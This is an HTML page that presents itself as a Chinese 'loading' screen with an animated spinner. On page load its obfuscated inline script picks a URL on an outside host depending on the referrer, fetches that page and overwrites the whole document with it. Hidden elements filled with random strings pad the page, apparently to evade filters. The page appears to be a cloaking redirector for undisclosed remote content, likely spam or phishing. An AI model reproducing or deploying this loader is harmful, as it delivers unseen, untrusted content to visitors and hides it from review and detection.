<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hJDI257OH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hJDI257OH .Ij7xl2p0ae {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hJDI257OH .content {
            line-height: 50px;
            text-align: center
        }

        .hJDI257OH .img {
            width: 100%
        }

        .hJDI257OH .xS41Dvs {
            text-align: center
        }

        .hJDI257OH .xS41Dvs span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hJDI257OH .xS41Dvs span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hJDI257OH .xS41Dvs span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hJDI257OH .xS41Dvs span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hJDI257OH .xS41Dvs span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hJDI257OH .xS41Dvs span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hJDI257OH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function kASWleyFJK5o(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var SvGHIu = kASWleyFJK5o('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ SvGHIu +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ SvGHIu +".html?a=share";
		}
		
        rSUr1oV=url+"#"+new Date().getTime();
        rSUr1oV && function() {
            $.get(rSUr1oV, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >kTl1lTnUyx3AQvRZvIHuwF8XPyqAh3H06mR3Ek0m64VzA7rqXQ8CiuGyF</h1>
<p  style='display:none'>Z0tGAk9CdWQ7WQdrBLYzIUvja8qKF22Y4SsEUZSJSYSsIQYf6y1wlu7y2Ov</p>
<ul style='display:none' >ooZrkbaw0nGNsIgWxqqwh7VXHR6mBWTJPAOH9jBIYRA0Ej2EXsMzNK</ul>
<li style='display:none' >lB1BSzroYG2wPYmpf</li>
<ul style='display:none' >ooZrkbaw0nGNsIgWxqqwh7VXHR6mBWTJPAOH9jBIYRA0Ej2EXsMzNK</ul>
<b style='display:none' >tCdvddVHrhGg8N4STIR</b>
<h1 style='display:none' >kTl1lTnUyx3AQvRZvIHuwF8XPyqAh3H06mR3Ek0m64VzA7rqXQ8CiuGyF</h1>
<p  style='display:none'>Z0tGAk9CdWQ7WQdrBLYzIUvja8qKF22Y4SsEUZSJSYSsIQYf6y1wlu7y2Ov</p>
<span style='display:none'>HMf1aaDOGdFrBW2IxCqbEa</span><div class="hJDI257OH">
    <div class="Ij7xl2p0ae">
        <div class="xS41Dvs">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>P2khadrXwSu2jY09qrlaalsA85z0xXKeY8aLm1z8U04X2ZY2d7MgeFwH3awLOu7UwJs4AAqYKQUuV2PNWARS</div>
<div style='display:none'>P2khadrXwSu2jY09qrlaalsA85z0xXKeY8aLm1z8U04X2ZY2d7MgeFwH3awLOu7UwJs4AAqYKQUuV2PNWARS</div>
<a  href='#' style='display:none'>eyxstT55L9rx1IgrDW5LaICzncpqLRMswcN2vVDi9SGlLNFEBE6ushP9TqvPl5fF</a>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>eyxstT55L9rx1IgrDW5LaICzncpqLRMswcN2vVDi9SGlLNFEBE6ushP9TqvPl5fF</a>
<div style='display:none'>P2khadrXwSu2jY09qrlaalsA85z0xXKeY8aLm1z8U04X2ZY2d7MgeFwH3awLOu7UwJs4AAqYKQUuV2PNWARS</div>
<h1 style='display:none' >cOXWcxVhvhVjoUkzrwcrE8BJ74xm8gzMauvVBm1I</h1></body>
</html>